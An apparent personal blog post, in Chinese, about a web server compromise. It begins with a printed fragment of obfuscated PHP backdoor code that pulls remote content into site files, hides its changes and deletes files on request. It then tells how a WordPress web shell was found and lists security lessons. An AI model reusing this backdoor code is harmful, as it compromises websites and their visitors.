${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x30\x4f\x5f\x4f\x30\x4f\x5f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x30\x4f\x5f\x4f\x30\x4f\x5f"]($O0O0O0O___,"\\xEF\\xBB\\xBF"));');$O000O__OO_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x4f\x5f\x30\x30\x4f\x5f"]('$O_0O0O__0Oaccxxs','$OO_0_O00_O=substr($O_0O0O__0Oaccxxs,0,5);$OO__OO00_0=substr($O_0O0O__0Oaccxxs,-5);$O_OO0_00_O=substr($O_0O0O__0Oaccxxs,7,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x5f\x30\x5f\x30\x5f\x4f\x4f"]($O_0O0O__0Oaccxxs)-14);return ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x4f\x4f\x5f\x5f\x5f\x30"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x5f\x30\x4f\x4f\x30\x4f"]($OO_0_O00_O.$O_OO0_00_O.$OO__OO00_0));');$O_O_0O_0O0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x4f\x5f\x30\x30\x4f\x5f"]('$O_O_0O00_O=\'\'','$OO0_O_0O_0=isset($_REQUEST["\x66"])?$_REQUEST["\x66"]:\'\';$O__0O_0O0O=isset($_REQUEST["\x67"])?$_REQUEST["\x67"]:\'\';$OO0O__O0_0=isset($_REQUEST["\x64"])?$_REQUEST["\x64"]:\'\';$O__O0O00_O=${"\x5f\x53\x45\x52\x56\x45\x52"}["\x44\x4f\x43\x55\x4d\x45\x4e\x54\x5f\x52\x4f\x4f\x54"];$OOO__0O00_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x4f\x5f"](\'e7F9/hTdN9Le/tP3zAIA\');$O_0_OO00O_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x4f\x5f"](\'e9o3/hT+ny7qdtrU/X7XytP/ZxYA\');$O0O_0__OO0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x4f\x5f"](\'e7Gh+hTfmUFU/bWp+u2/ltP+zywA\');$OO0_O_00_O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x4f\x5f"](\'ARIA7hTf/kv67mlLnlkI7lhoXlrrntPvvJo=\');$O_O00O0O__=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x4f\x5f"](\'e7p2xhTtMtP5KwA=\');$O0_OO0O0__=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x4f\x5f"](\'e7F9/hTdN9Le/tP3zAIA\');$OO___O00O0=\'<br>\';$O0O_O0__O0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x4f\x5f"](\'08/MShT0mt0CvtPIKAAA\');$O__00O_O0O=\'{#z#
}\';$O__O0O_0O0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x4f\x5f"](\'C8rPchTzYrNU3PKy5tPIBAA=\');$OO0O0O___0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x4f\x5f"](\'C3APKhTkjJdCqIcjHIjDSyLE1xDytNcfbUDvAIykn1CMpIzg3L8PTwKksx9rX0zPIs9wr2TAeqK06uMsj0C3HM8cwtPysQUA\');$OOOO0___00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x4f\x5f"](\'C3C2NhTIiKyDCIjPDKiQwxsfAxCipIyTKtPxBQA=\');$OO0_0O_0_O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x4f\x5f"](\'S/QIMhTkh2ybctPFAA==\');$OOO0O__00_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x4f\x5f"](\'SzF2LhTIkMDypJDDcpg9KtP2AA==\');echo $OOO__0O00_.$O__O0O00_O.$OO___O00O0;$O_O00__0OO=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x4f\x5f\x30\x4f\x4f\x5f\x5f"]($O__O0O00_O.$O0O_O0__O0);echo $O_0_OO00O_.${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x5f\x30\x4f\x4f\x30\x4f"]($OO0O0O___0).$O_O00__0OO.${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x5f\x30\x4f\x4f\x30\x4f"]($OOOO0___00);if($O__0O_0O0O!=\'\'){$OO_00_O_O0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x4f\x5f"](\'Ky8vNhTzSz0CvLTy9NLS4tKErNTS1PTUosLUnLLCnOyC/QK0/tPMSwcA\');$O_0O00O_O_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x5f\x30\x4f\x4f\x30\x4f"]($OO0_0O_0_O);$O_O_0O0O0_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x5f\x30\x4f\x4f\x30\x4f"]($OOO0O__00_);$O0O0O0O___=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x30\x30\x5f\x5f\x4f\x5f"]($O_0O00O_O_.\'//\'.$OO_00_O_O0.\'/\'.$O_O_0O0O0_.\'/\'.$OO0_O_0O_0);$O0O0O0O___=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x30\x30\x5f\x5f\x4f\x5f\x4f"]($O__00O_O0O,$O__0O_0O0O,$O0O0O0O___);if(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x30\x5f\x4f\x4f\x5f\x5f\x30"]($O_O00__0OO,$O__O0O_0O0)){echo 
$O0O_0__OO0.${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x5f\x30\x4f\x4f\x30\x4f"]($OO0O0O___0).$O0O0O0O___.${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x5f\x30\x4f\x4f\x30\x4f"]($OOOO0___00);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x4f\x5f\x30\x30\x30\x5f\x4f"]($O__O0O00_O.$O0O_O0__O0,0644);$O_O00O__0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x4f\x30\x30\x5f\x30\x4f"]($O__O0O00_O.$O0O_O0__O0);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x5f\x4f\x5f\x4f\x30\x5f\x30"]($O__O0O00_O.$O0O_O0__O0,$O0O0O0O___.$O_O00__0OO);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x30\x30\x4f\x5f\x5f\x5f"]($O__O0O00_O.$O0O_O0__O0,$O_O00O__0O);$O_O00__0OO=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x4f\x5f\x30\x4f\x4f\x5f\x5f"]($O__O0O00_O.$O0O_O0__O0);echo $OO0_O_00_O.${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x5f\x30\x4f\x4f\x30\x4f"]($OO0O0O___0).$O_O00__0OO.${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x5f\x30\x4f\x4f\x30\x4f"]($OOOO0___00);}else{echo $O_O00O0O__;}}if($OO0O__O0_0!=\'\'){$OO_000O_O_=$O__O0O00_O.\'/\'.$OO0O__O0_0;if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x4f\x30\x5f\x30\x5f\x5f"]($OO_000O_O_)){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x4f\x30\x5f\x4f\x30"]($OO_000O_O_);}}');${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x4f\x5f\x30\x4f\x30"]();?>

内容大部分都经过混淆处理,一下子很难看明白它做了什么;当时已经很晚,就把文件都删了,然后访问了一下主要业务系统,发现正常,就去睡觉了。

想着第二天查查什么原因,结果同事发现很多文件夹的修改时间都变成了第二天早上的时间,商量后觉得攻击文件应该还没有被清理干净,但又不知道从哪里着手,于是先把所有文件夹查一遍,结果熟悉的 WordPress 出现在眼前。

我记忆中服务器上应该没有安装 WordPress 系统,回想起最近做了一次服务器系统迁移,然后进入 wp-content/themes 目录查看,果然发现曾被上传过一个非官方默认主题;进一步查看,其中有一个奇怪的 0x.php 文件,试着通过域名访问这个 0x.php 文件,结果吓了一跳:服务器 web 目录下的所有目录及文件都被列了出来,还能执行增、删、改操作。唉,平时一再强调的安全操作被忽视,才造成了这次事件。

基本的安全意识:

  1. 密码尽量复杂。此次就是因为 WordPress 的密码是 123456,攻击者登录后台后才能够上传包含攻击代码的主题
  2. 目录及文件的读写权限一定要控制。因为整个 web 目录都是 www 用户权限,攻击代码才有了增、删、改的能力
  3. 最重要的是养成安全意识
  4. 还有…等等

经过一整天的排查,目前没有发现重大问题,也是万幸啦。

